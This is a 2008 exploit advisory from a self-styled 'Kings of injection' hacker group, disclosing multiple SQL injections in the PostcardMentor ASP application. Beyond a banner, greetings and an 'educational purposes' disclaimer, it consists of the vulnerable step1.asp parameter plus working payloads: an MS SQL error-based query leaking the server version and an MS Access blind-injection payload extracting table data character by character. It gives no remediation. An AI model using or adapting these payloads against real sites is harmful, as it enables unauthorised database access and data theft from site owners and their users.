postcardmentor-sql.txt
Posted on 08 May 2008
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | _ __ __ __ ______ | | /' __ /'__' / \__ /'__' / ___ | | /\_, ___ /\_/\_L ___ ,_/ / _ __ \__/ | | /_/ /' _ ' / /_/_\_<_ /'___ / /\''__ \___'' | | / / / L / \__/ \_ \_ / / L | | \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ \____/ | | /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ /___/ | | \____/ >> Kings of injection | | /___/ | | | |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| Title :: Multiple SQL Injections [Remote + Blind] Author :: InjEctOrs Found By : Bl@ckbe@rD [blackbeard-sql (at) hotmail (dot) fr ] Application :: PostcardMentor latest version Download :: http://www.aspcode.net/Download-latest-version-4.aspx Dork 1 :: :p Greets :: Allah , King Of hacker , InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts. --------------------------------------------[C o n t e x t]----------------------------------------- Vulnerability: http://localhost/PostcardMentor/step1.asp?cat_fldAuto={SQL} {SQL} --> MS SQL Server for example : convert(int,(select+@@version)) {SQL} --> MS ACCESS for example : 1 IIF((select%20mid(last(name),1,1)%20from%20(select%20top%2010%20name%20from%20cat))='a',0,'done') -------------------------------------------[End of context]----------------------------------------
